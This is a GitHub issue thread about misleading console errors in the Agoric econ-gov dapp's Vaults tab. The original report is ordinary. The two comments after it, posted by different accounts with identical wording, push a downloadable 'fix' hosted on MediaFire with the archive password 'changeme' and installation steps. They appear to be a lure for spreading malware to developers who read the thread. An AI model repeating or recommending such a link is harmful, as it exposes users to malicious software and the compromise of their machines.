### ISSUE TITLE
erroneous error messages

### ISSUE THREAD

**Issue by turadg** [Agoric/dapp-econ-gov#121]
When the app is behaving correctly, there are still error messages in the console. These can be very misleading while diagnosing other problems.

**To Reproduce**

1. Open https://econ-gov.inter.trade/?agoricNet=xnet
2. Click on Vaults tab

**Expected behavior**
No errors from expected data

Bonus: report errors up to the UI, not just console (This could help us to clean up errors that aren't really errors)

**Screenshots**
![Screenshot 2024-08-26 at 10 51 24 AM](https://github.com/user-attachments/assets/5920967e-df32-497e-8833-d900f86e67f1)

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
